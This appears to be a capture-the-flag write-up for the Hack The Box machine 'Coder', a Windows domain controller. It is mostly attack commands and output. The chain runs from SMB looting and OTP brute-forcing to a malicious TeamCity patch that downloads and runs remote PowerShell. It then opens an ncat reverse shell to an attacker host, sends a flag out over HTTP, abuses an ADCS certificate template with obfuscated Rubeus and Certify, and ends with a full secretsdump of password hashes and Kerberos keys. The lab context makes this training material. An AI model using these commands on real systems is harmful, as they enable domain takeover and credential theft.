Scanning
> TARGET=10.129.202.102 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-04-03 03:35:05Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: coder.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.coder.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.coder.htb
| Issuer: commonName=coder-DC01-CA/domainComponent=coder
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-30T04:24:26
| Not valid after: 2023-06-30T04:24:26
| MD5: 7a8963c8621ca1c1a510001350d86800
| SHA-1: 93e2a8bd85dc5a8767ffa4c131003634d14db0d7
|_ssl-date: 2023-04-03T03:36:22+00:00; +6h25m37s from scanner time.
443/tcp open ssl/http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2023-04-03T03:36:21+00:00; +6h25m38s from scanner time.
| ssl-cert: Subject: commonName=default-ssl/organizationName=HTB/stateOrProvinceName=CA/countryName=US/localityName=Somewhere/organizationalUnitName=IT
| Issuer: commonName=coder-DC01-CA/domainComponent=coder
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-04T17:25:43
| Not valid after: 2032-11-01T17:25:43
| MD5: e5fea439d8356660c2b778e578a1244e
| SHA-1: 733cf4571caafdaa8ad1e8fb0abc6fec7f932977
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127
|_ssl-date: 2023-04-03T03:36:21+00:00; +6h25m38s from scanner time.
| ssl-cert: Subject: commonName=dc01.coder.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.coder.htb
| Issuer: commonName=coder-DC01-CA/domainComponent=coder
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-30T04:24:26
| Not valid after: 2023-06-30T04:24:26
| MD5: 7a8963c8621ca1c1a510001350d86800
| SHA-1: 93e2a8bd85dc5a8767ffa4c131003634d14db0d7
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49681/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49690/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49701/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49708/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
62968/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Enum
- Subdomain enum, nothing found
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://coder.htb/" -H "Host: FUZZ.coder.htb"
> kerbrute userenum -d coder.htb --dc $TARGET /usr/share/wordlists/kerberos_enum_userlists/A-Z.Surnames.txt
2023/04/02 17:38:39 > [+] VALID USERNAME: E.BLACK@coder.htb
2023/04/02 17:41:01 > [+] VALID USERNAME: J.BRIGGS@coder.htb
- Found a smb share:
Development
└─# smbclient -L \\\\10.129.202.102\\ -N
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Development Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
- In
Temporary Projects
folder, there is an exe and an .enc file
smb: \> cd "Temporary Projects"
smb: \Temporary Projects\> ls
. D 0 Fri Nov 11 17:19:03 2022
.. D 0 Fri Nov 11 17:19:03 2022
Encrypter.exe A 5632 Fri Nov 4 12:51:59 2022
s.blade.enc A 3808 Fri Nov 11 17:17:08 2022
6232831 blocks of size 4096. 904958 blocks available
- In
Migrations
folder, there are a lot of files, - Recursively download everything from the Migrations folder
smb: \> cd Migrations
smb: \Migrations\> mask ""
smb: \Migrations\> recurse ON
smb: \Migrations\> prompt OFF
smb: \Migrations\> mget *
Encrypter.exe reverse engineering
- Reading from the smb share, the file
s.blade.enc
was last changed at Fri Nov 11 05:17:08 PM 2022 EST
- This corresponds to:
1668140228
smb: \Temporary Projects\> allinfo s.blade.enc
altname: SBLADE~1.ENC
create_time: Mon Nov 7 04:05:03 PM 2022 EST
access_time: Fri Nov 11 05:17:08 PM 2022 EST
write_time: Fri Nov 11 05:17:08 PM 2022 EST
change_time: Fri Nov 11 05:17:08 PM 2022 EST
- Using
dotPeak
to reserve the Encrypter.exe
binary, this is an AES encryption tool
using System;
using System.IO;
using System.Security.Cryptography;
internal class AES
{
public static void Main(string[] args)
{
if (args.Length != 1)
{
Console.WriteLine("You must provide the name of a file to encrypt.");
}
else
{
FileInfo fileInfo = new FileInfo(args[0]);
string destFile = Path.ChangeExtension(fileInfo.Name, ".enc");
Random random = new Random(Convert.ToInt32(DateTimeOffset.Now.ToUnixTimeSeconds()));
byte[] numArray1 = new byte[16];
random.NextBytes(numArray1);
byte[] numArray2 = new byte[32];
random.NextBytes(numArray2);
AES.EncryptFile(fileInfo.Name, destFile, numArray2, numArray1);
}
}
private static byte[] EncryptFile(string sourceFile, string destFile, byte[] Key, byte[] IV)
{
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
{
using (FileStream fileStream1 = new FileStream(destFile, FileMode.Create))
{
using (ICryptoTransform encryptor = rijndaelManaged.CreateEncryptor(Key, IV))
{
using (CryptoStream cryptoStream = new CryptoStream((Stream) fileStream1, encryptor, CryptoStreamMode.Write))
{
using (FileStream fileStream2 = new FileStream(sourceFile, FileMode.Open))
{
byte[] buffer = new byte[1024];
int count;
while ((count = fileStream2.Read(buffer, 0, buffer.Length)) != 0)
cryptoStream.Write(buffer, 0, count);
}
}
}
}
}
return (byte[]) null;
}
}
- Modify the above code to decrypt the
s.blade.enc
file, this is actually a 7z file
using System;
using System.IO;
using System.Security.Cryptography;
internal class AES
{
public static void Main(string[] args)
{
string fileInfo = "C:\\test\\file.enc";
string destFile = "C:\\test\\file.txt";
//Random random = new Random(Convert.ToInt32(DateTimeOffset.Now.ToUnixTimeSeconds()));
Random random = new Random(Convert.ToInt32(1668205028));
byte[] numArray1 = new byte[16];
random.NextBytes(numArray1);
byte[] numArray2 = new byte[32];
random.NextBytes(numArray2);
AES.DecryptFile(fileInfo, destFile, numArray2, numArray1);
}
private static byte[] DecryptFile(string sourceFile, string destFile, byte[] Key, byte[] IV)
{
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
{
using (FileStream fileStream1 = new FileStream(destFile, FileMode.Create))
{
using (ICryptoTransform decryptor = rijndaelManaged.CreateDecryptor(Key, IV))
{
using (CryptoStream cryptoStream = new CryptoStream((Stream)fileStream1, decryptor, CryptoStreamMode.Write))
{
using (FileStream fileStream2 = new FileStream(sourceFile, FileMode.Open))
{
byte[] buffer = new byte[1024];
int count;
while ((count = fileStream2.Read(buffer, 0, buffer.Length)) != 0)
{
cryptoStream.Write(buffer, 0, count);
}
}
}
}
}
}
return (byte[])null;
}
}
- Extract the 7z file, got the following
> ls -la
total 16
drwxr-xr-x 2 root root 4096 Apr 3 06:07 .
drwxr-xr-x 4 root root 4096 Apr 3 06:07 ..
-rw-r--r-- 1 root root 1024 Nov 3 16:02 .key
-rw-r--r-- 1 root root 2590 Nov 11 17:13 s.blade.kdbx
Defeating otp -> Teamcity
> kpcli
kpcli:/> open s.blade.kdbx .key
Provide the master password: *************************
kpcli:/> ls
=== Groups ===
Root/
kpcli:/> cd Root
kpcli:/Root> ls
=== Entries ===
0. Authenticator backup codes
1. O365
2. Teamcity teamcity-dev.coder.htb
kpcli:/Root> show 0
Title: Authenticator backup codes
Uname:
Pass:
URL:
Notes: {
"6132e897-44a2-4d14-92d2-12954724e83f": {
"encrypted": true,
"hash": "6132e897-44a2-4d14-92d2-12954724e83f",
"index": 1,
"type": "totp",
"secret": "U2FsdGVkX1+3JfFoKh56OgrH5jH0LLtc+34jzMBzE+QbqOBTXqKvyEEPKUyu13N2",
"issuer": "TeamCity",
"account": "s.blade"
},
"key": {
"enc": "U2FsdGVkX19dvUpQDCRui5XaLDSbh9bP00/1iBSrKp7102OR2aRhHN0s4QHq/NmYwxadLeTN7Me1a3LrVJ+JkKd76lRCnd1utGp/Jv6w0hmcsqdhdccOpixnC3wAnqBp+5QyzPVaq24Z4L+Rx55HRUQVNLrkLgXpkULO20wYbQrJYN1D8nr3g/G0ukrmby+1",
"hash": "$argon2id$v=19$m=16384,t=1,p=1$L/vKleu5gFis+GLZbROCPw$OzW14DA0kdgIjCbo6MPDYoh+NEHnNCNV"
}
}
pcli:/Root> show 1
Title: O365
Uname: s.blade@coder.htb
Pass: AmcwNO60Zg3vca3o0HDrTC6D
URL:
Notes:
kpcli:/Root> get 1 Pass
AmcwNO60Zg3vca3o0HDrTC6D
kpcli:/Root> show 2
Title: Teamcity
Uname: s.blade
Pass: veh5nUSZFFoqz9CrrhSeuwhA
URL: https://teamcity-dev.coder.htb
Notes:
kpcli:/Root> get 2 Pass
veh5nUSZFFoqz9CrrhSeuwhA
- Then, we can use the found credential for
teamcity-dev.coder.htb
to login and it has a mfa as well. However, after some trials, you can find out that the one-time-password is not actually one-time. No matter how many failed try you attempt, it doesn’t expire, so we can bruteforce this 6-digit otp here. - Use burp to intercept the request and pass it to fuff for this, below is an example request from burp
POST /2fa.html HTTP/2
Host: teamcity-dev.coder.htb
Cookie: TCSESSIONID=6C934D38FD2B1C10DC94EB718D381AD7; __test=1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://teamcity-dev.coder.htb/2fa.html
X-Requested-With: XMLHttpRequest
X-Teamcity-Client: Web UI
X-Tc-Csrf-Token: a9a07a59-729a-4e14-97b5-5e265a3bd1e7
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: https://teamcity-dev.coder.htb
Content-Length: 15
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
password=116384
- i compiled the list of 6-digits using rockyou.txt
> grep -o '[0-9][0-9][0-9][0-9][0-9][0-9]' /usr/share/wordlists/rockyou.txt > numbers.txt
> sort numbers.txt | uniq -u > number.txt
- Eventually, we can bruteforce it and find out the otp, note the otp is different each time.
> ffuf -request 2fa.req -w number.txt -X POST -d "password=FUZZ" -u https://teamcity-dev.coder.htb/2fa.html -fs 89 -t 160
619433 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 282ms]
- After logging into the teamcity webapp, you can run a build.
- The build can be
run as a personal build
, where you can upload a patch file. - Remember
Develpment\Migrations\teamcity_test_repo
, it is a git repo where a simple script called hello_world.ps1
can be found. - On teamcity, there is a build job called
Development_Testing
that points to this repo. So, we can create a patch using the repo we fetched from SMB and upload the patch and let teamcity run the patched version of the script. - To create a patch, change the existing
Develpment\Migrations\teamcity_test_repo\hello_world.ps1
file
#Simple repo test for Teamcity pipeline
write-host "Helloooooooooooooooooo"
IEX (New-Object Net.WebClient).DownloadString('http://<attacker>/shell.ps1')
- Create a patch for the change
> git diff --oneline --graph 4aefc023afb818866bd8c0920d438b44e76f642b > patch.diff
- Before, we upload this patch to teamcity, let’s create a
shell.ps1
script and serve it with a http server, this script can contain any code we’d like to run. - Using this way, we are able to execute powershell script on the target in the teamcity’s build. To create a reverse shell, we will utilize the
ncat.exe
from nmap https://nmap.org/, because this one doesn’t get detected by Windows Defender. - We need to upload three files to the target to be able to user
ncat.exe
Invoke-WebRequest -URI http://<attacker>/ncat.exe -OutFile C:\Users\svc_teamcity\Documents\ncat.exe
Invoke-WebRequest -URI http://<attacker>/libcrypto-3.dll -OutFile C:\Users\svc_teamcity\Documents\libcrypto-3.dll
Invoke-WebRequest -URI http://<attacker>/libssl-3.dll -OutFile C:\Users\svc_teamcity\Documents\libssl-3.dll
ls C:\Users\svc_teamcity\Documents\
# for persistent shell, otherwise the shell terminates every 2 minutes
Invoke-Expression 'cmd /c start C:\Users\svc_teamcity\Documents\ncat.exe <attacker> 4444 -e cmd.exe'
Start-Sleep -Seconds 3600
- Now, once everything is prepared, run a build and make it
run as a personal build
, then upload the patch.diff
to it. - Observe our http server, the teamcity build will apply the patch and fetch our
shell.ps1
script which will return us a reverse shell. Note: the lifetime of the shell is very short - To improve the shell lifetime, use the following
Invoke-Expression 'cmd /c start C:\Users\svc_teamcity\Documents\ncat.exe <attacker> 4444 -e cmd.exe'
Start-Sleep -Seconds 3600
ALL_USERS_GROUP
All Users
Contains all TeamCity users
admin
<$2a$07$C1mKhkoe2iSBckV6afRAk.axurQlb0qfG9HcmAnZbKb8ze72JPVxu
BCRYPT
s.blade
<$2a$07$ZFoMFfAMVXp7NMMoqiqS2ObEmLku16FjoIwM93ImTPuCqkPFAvA6e
Sonya Blade
s.blade@coder.htb
BCRYPT
e.black
<$2a$07$8rZyG7lU9.1/Wo3EdFf5zuN4NNLZXB7K02LFN6qVHCJIAdVP1X3AK
Erron Black
e.black@coder.htb
YR.C
BCRYPT
User flag: e.black
- Found a patch file at
c:\ProgramData\JetBrains\TeamCity\system\changes>type 101.changes.diff
diff --git a/Get-ADCS_Report.ps1 b/Get-ADCS_Report.ps1
index d6515ce..a990b2e 100644
--- a/Get-ADCS_Report.ps1
+++ b/Get-ADCS_Report.ps1
@@ -77,11 +77,15 @@ Function script:send_mail {
[string]
$subject
)
+
+$key = Get-Content ".\key.key"
+$pass = (Get-Content ".\enc.txt" | ConvertTo-SecureString -Key $key)
+$cred = New-Object -TypeName System.Management.Automation.PSCredential ("coder\e.black",$pass)
$emailFrom = 'pkiadmins@coder.htb'
$emailCC = 'e.black@coder.htb'
$emailTo = 'itsupport@coder.htb'
$smtpServer = 'smtp.coder.htb'
-Send-MailMessage -SmtpServer $smtpServer -To $emailTo -Cc $emailCC -From $emailFrom -Subject $subject -Body $message -BodyAsHtml -Priority High
+Send-MailMessage -SmtpServer $smtpServer -To $emailTo -Cc $emailCC -From $emailFrom -Subject $subject -Body $message -BodyAsHtml -Priority High -Credential $cred
}
diff --git a/enc.txt b/enc.txt
new file mode 100644
index 0000000..d352634
--- /dev/null
+++ b/enc.txt
@@ -0,0 +1,2 @@
+76492d1116743f0423413b16050a5345MgB8AGoANABuADUAMgBwAHQAaQBoAFMAcQB5AGoAeABlAEQAZgBSAFUAaQBGAHcAPQA9AHwANABhADcANABmAGYAYgBiAGYANQAwAGUAYQBkAGMAMQBjADEANAAwADkAOQBmADcAYQBlADkAMwAxADYAMwBjAGYAYwA4AGYAMQA3ADcAMgAxADkAYQAyAGYAYQBlADAAOQA3ADIAYgBmAGQAN
+AA2AGMANQBlAGUAZQBhADEAZgAyAGQANQA3ADIAYwBjAGQAOQA1ADgAYgBjAGIANgBhAGMAZAA4ADYAMgBhADcAYQA0ADEAMgBiAGIAMwA5AGEAMwBhADAAZQBhADUANwBjAGQANQA1AGUAYgA2AGIANQA5AGQAZgBmADIAYwA0ADkAMgAxADAAMAA1ADgAMABhAA==
diff --git a/key.key b/key.key
new file mode 100644
index 0000000..a6285ed
--- /dev/null
+++ b/key.key
@@ -0,0 +1,32 @@
+144
+255
+52
+33
+65
+190
+44
+106
+131
+60
+175
+129
+127
+179
+69
+28
+241
+70
+183
+53
+153
+196
+10
+126
+108
+164
+172
+142
+119
+112
+20
+122
> git apply 101.changes.diff
- This will create two files:
enc.txt
and key.key
- These two files can be used to uncover the password for
e.black
:ypOSJXPqlDOxxbQSfEERy300
$key = Get-Content ".\key.key"
$SecurePassword = (Get-Content ".\enc.txt" | ConvertTo-SecureString -Key $key)
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($SecurePassword)
$UnsecurePassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
[Runtime.InteropServices.Marshal]::ZeroFreeBSTR($BSTR)
$UnsecurePassword
# ypOSJXPqlDOxxbQSfEERy300
> evil-winrm -u e.black -p ypOSJXPqlDOxxbQSfEERy300 -i coder.htb
- Alternatively, can also run as
e.black
and leak the user flag
# in svc_teamcity's shell
$SecPassword = ConvertTo-SecureString 'ypOSJXPqlDOxxbQSfEERy300' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('e.black', $SecPassword)
$session = New-PSSession -Credential $Cred
Invoke-Command -Session $session -scriptblock { IEX(New-Object Net.WebClient).downloadString('http://<attacker>/shell2.ps1') }
# shell2.ps1
$result=Get-Content "C:\Users\e.black\Desktop\user.txt"
Invoke-WebRequest -URI http://<attacker>/?$result
PE Enum
- Enum the ldap directory, the user e.black belongs to PKI Admins group so is able to modify
Certificate Templates
.
*Evil-WinRM* PS C:\Users\e.black\Documents> Import-Module ActiveDirectory
*Evil-WinRM* PS C:\Users\e.black\Documents> (Get-Acl -Path "AD:CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb").Access
> ldapdomaindump -u 'coder.htb\e.black' -p ypOSJXPqlDOxxbQSfEERy300 ldaps://coder.htb
PE: root
> ./nimcrypt -f Rubeus.exe -t csharp -u -e -o NimRubeus.exe
> ./nimcrypt -f Certify.exe -t csharp -u -e -o NimCertify.exe
# on target
Invoke-WebRequest -URI http://<attacker>/NimCertify.exe -outfile NimCertify.exe
Invoke-WebRequest -URI http://<attacker>/NimRubeus.exe -outfile NimRubeus.exe
Invoke-WebRequest -URI http://<attacker>/ADCSTemplate/ADCSTemplate.psm1 -outfile ADCSTemplate.psm1
Invoke-WebRequest -URI http://<attacker>/ADCSTemplate/ADCSTemplate.psd1 -outfile ADCSTemplate.psd1
Import-Module .\ADCSTemplate.psm1
Export-ADCSTemplate -displayname "Administrator" > .\Administrator.json
# get the json to kali
> download Administrator.json
# modify the template
# "msPKI-Certificate-Name-Flag": 65537,
# re-upload to target
Invoke-WebRequest -URI http://<attacker>/FakeAdmin.json -outfile FakeAdmin.json
New-ADCSTemplate -DisplayName FakeAdmin -JSON (Get-Content .\FakeAdmin.json -Raw) -Identity e.black -AutoEnroll -Publish
# this will generate a certificate, copy it to kali
.\NimCertify.exe request /ca:dc01.coder.htb\coder-DC01-CA /template:FakeAdmin /altname:Administrator
# in kali
> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# upload to target
Invoke-WebRequest -URI http://<attacker>/cert.pfx -outfile cert.pfx
# this will generate a ticket in base64
.\NimRubeus.exe asktgt /user:Administrator /certificate:cert.pfx /ptt
- Copy the base64 ticket and save to a file
kirbi.b64
> cat kirbi.b64| base64 -d > ticket.kirbi
> /usr/bin/impacket-ticketConverter ticket.kirbi ticket.ccache
> export KRB5CCNAME=ticket.ccache
# login to get the root flag
> wmiexec.py coder.htb/Administrator@dc01.coder.htb -k -no-pass -debug
flags
- user: bfa700491a2df70dc0cd44404f5fd550
- root: 833fa29dd0e4aab2f56bb9800db76bf4
post-loot
secretsdump.py -k dc01.coder.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x14fde48e78a860a3522e88d90440ae18
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:88c80d0cbc1a15acec2a8d26a259b623:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CODER\DC01$:plain_password_hex:53f0ac34015324a16713abf25e37d42e7addac4e18df92bcc463d596d67c58ea888783e86c6ca96e6d8743112eb0526a126db0d71f609264246041b8a419dd167d44f581af8445f9a881f5c456c812148c0e0ff57f7ae29f09fe520f65e815065cf85ee7054e68cf3d08209d7e5c76d5da06d3918578ac22d7ee5e8d4147c4b6f95c94b6a8cfc0fe11f01eae1f6dbd75d84730fd1a46bb50b9fabe03583bfa027da536c09dd073982940e11e81a4cfcd6d35d08525eacd84277ff10f3a6d23eb0127c6e817e64e260776bc8da96fe0957134af0c56a84630b036a80bf4768b85616525d1a49abcb6c3242749e7abc84c
CODER\DC01$:aad3b435b51404eeaad3b435b51404ee:56dc040d21ac40b33206ce0c2f164f94:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xd6a71ac74108561425992a1ccd8dc2f1b61a5e94
dpapi_userkey:0xe20e4eebc68a5899e9e08c79067891659e5f01cd
[*] NL$KM
0000 D5 26 FB BE 60 59 13 18 25 58 42 70 F9 10 53 05 .&..`Y..%XBp..S.
0010 E2 04 5E 52 61 5F B3 2E CB 8E EF 43 F0 2C 39 AB ..^Ra_.....C.,9.
0020 66 C0 4A 81 EA C8 1D 99 64 44 05 17 16 20 E0 87 f.J.....dD... ..
0030 88 56 AF 5C 57 61 24 70 3D F7 FF 93 EC 59 02 AC .V.\Wa$p=....Y..
NL$KM:d526fbbe6059131825584270f9105305e2045e52615fb32ecb8eef43f02c39ab66c04a81eac81d99644405171620e0878856af5c576124703df7ff93ec5902ac
[*] _SC_TCBuildAgent
CODER\svc_teamcity:SJ3UBHX7Adm0inoXlGyDFG5G
[*] _SC_TeamCity
CODER\svc_teamcity:SJ3UBHX7Adm0inoXlGyDFG5G
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:807726fcf9f188adc26eeafd7dc16bb7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:26000ce1f6ca4029ec5d3a95631e797c:::
coder.htb\e.black:1106:aad3b435b51404eeaad3b435b51404ee:e1b96bbb66a073787a3310b5a956200d:::
coder.htb\c.cage:1107:aad3b435b51404eeaad3b435b51404ee:3ab6e9f70dbc0d19623be042d224b993:::
coder.htb\j.briggs:1108:aad3b435b51404eeaad3b435b51404ee:e38976c0b20e3e41e9c62da792115a33:::
coder.htb\l.kang:1109:aad3b435b51404eeaad3b435b51404ee:b8aba4878e4777864b292731ac88b4cd:::
coder.htb\s.blade:1110:aad3b435b51404eeaad3b435b51404ee:4e4a79beed7d042627d0a7b10f5d008a:::
coder.htb\svc_teamcity:5101:aad3b435b51404eeaad3b435b51404ee:4c5a6890e09834a6834dbf7a76bf20cb:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:56dc040d21ac40b33206ce0c2f164f94:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:86a6a038ff6058c56a74e2e35008f6b037b8e7bca8c75cc5ee4495f77d0be71e
Administrator:aes128-cts-hmac-sha1-96:6d63b0853502cbbc8c8e40ad8fe88fa3
Administrator:des-cbc-md5:37feabd9d9575785
krbtgt:aes256-cts-hmac-sha1-96:aeb517a1efec8b79479cb1432e734555bc1039bcbd77bcdc39234b37199a70d3
krbtgt:aes128-cts-hmac-sha1-96:2bab4af978e4cee0b58fa1d377d35981
krbtgt:des-cbc-md5:100489b5839798cb
coder.htb\e.black:aes256-cts-hmac-sha1-96:ccb6c47af9a05d91e7610fe396cd8ffcc0e51279a2eee253fab1fb40536a5a85
coder.htb\e.black:aes128-cts-hmac-sha1-96:650ad0d49ab4bcff325a7f2a846d433f
coder.htb\e.black:des-cbc-md5:89290da2c2cd16ec
coder.htb\c.cage:aes256-cts-hmac-sha1-96:ea9cc2144c3106e9325b1ddda16c27c644d9f9b7e95098581ceba19c75d9b296
coder.htb\c.cage:aes128-cts-hmac-sha1-96:2cff13848c9e8d07339a6ab41bf72088
coder.htb\c.cage:des-cbc-md5:fd6d578510df1af1
coder.htb\j.briggs:aes256-cts-hmac-sha1-96:ec3ac8b99094903a3ca006a725dc0867666347efb4baf04d8b2f8b0305ab65ee
coder.htb\j.briggs:aes128-cts-hmac-sha1-96:39050d78545c40645fa889c13200f8f7
coder.htb\j.briggs:des-cbc-md5:7f5286d35def8f15
coder.htb\l.kang:aes256-cts-hmac-sha1-96:d7eb03d2695638c4ba423cd88e22dcdd7c0f6da996e5d6ed3af6c6d7e6c56661
coder.htb\l.kang:aes128-cts-hmac-sha1-96:25ad8331aa0fa2b26e220040b9e55937
coder.htb\l.kang:des-cbc-md5:571a573e61ced640
coder.htb\s.blade:aes256-cts-hmac-sha1-96:ceeab374597121113f3bdee3aab1fed0522506909b2f1ec24dfe36045eb3c252
coder.htb\s.blade:aes128-cts-hmac-sha1-96:69f4cada02748fba948e4c15460add9e
coder.htb\s.blade:des-cbc-md5:26eca8ad9deaada2
coder.htb\svc_teamcity:aes256-cts-hmac-sha1-96:b6c7ed72b4434a89c56295df6b42ca68937702dda15f90f23423e8712abce030
coder.htb\svc_teamcity:aes128-cts-hmac-sha1-96:d6604e2fadb40bbf71708e7b9c9734a7
coder.htb\svc_teamcity:des-cbc-md5:264ab5645ed91c86
DC01$:aes256-cts-hmac-sha1-96:a43b686fdd5f2e576ad834c5b1d4327dd5bdbd3ec579677343a2c6c43c8f1740
DC01$:aes128-cts-hmac-sha1-96:22192237a3cb399c19a6b469dcd1cba8
DC01$:des-cbc-md5:cb9758c162ba4943
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry